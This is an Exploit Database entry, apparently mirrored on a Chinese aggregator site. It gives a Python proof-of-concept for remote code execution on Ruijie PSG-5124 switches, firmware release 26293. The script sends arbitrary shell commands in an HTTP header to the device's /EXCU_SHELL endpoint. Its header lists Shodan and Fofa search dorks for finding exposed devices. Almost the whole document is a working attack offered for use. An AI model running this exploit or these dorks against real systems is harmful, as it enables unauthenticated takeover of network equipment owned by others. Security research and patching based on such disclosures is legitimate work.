Ruijie Switch PSG-5124 26293 – Remote Code Execution (RCE)

• Exploit Database
• 16 阅读

• 作者： ByteHunter
  日期： 2024-03-14
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51888/

• #- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)
  #- Shodan Dork: http.html_hash:-1402735717
  #- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif"
  #- Exploit Author: ByteHunter
  #- Email: 0xByteHunter@proton.me
  #- Version: PSG-5124(LINK SOFTWARE RELEASE:26293)
  #- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293)
  
  import http.client
  import argparse
  
  def send_request(ip, port, command):
  headers = {
  "Host": f"{ip}:{port}",
  "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
  "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
  "Accept-Language": "en-US,en;q=0.5",
  "Accept-Encoding": "gzip, deflate, br",
  "DNT": "1",
  "Connection": "close",
  "Upgrade-Insecure-Requests": "1",
  "Cmdnum": "1",
  "Confirm1": "n",
  "Content-Length": "0",
  "Command1": command
  }
  
  try:
  connection = http.client.HTTPConnection(f"{ip}:{port}")
  connection.request("GET", "/EXCU_SHELL", headers=headers)
  response = connection.getresponse()
  
  
  print(f"Status Code: {response.status}")
  print(response.read().decode('utf-8'))
  connection.close()
  
  except Exception as e:
  print(f"Request failed: {e}")
  
  if __name__ == "__main__":
  
  parser = argparse.ArgumentParser(description='proof of concept for ruijie Switches RCE')
  parser.add_argument('--ip', help='Target IP address', required=True)
  parser.add_argument('--port', help='Port', required=True)
  parser.add_argument('--cmd', help='Command', required=True)
  args = parser.parse_args()
  
  
  ip = args.ip
  port = args.port
  command = args.cmd
  
  
  send_request(ip, port, command)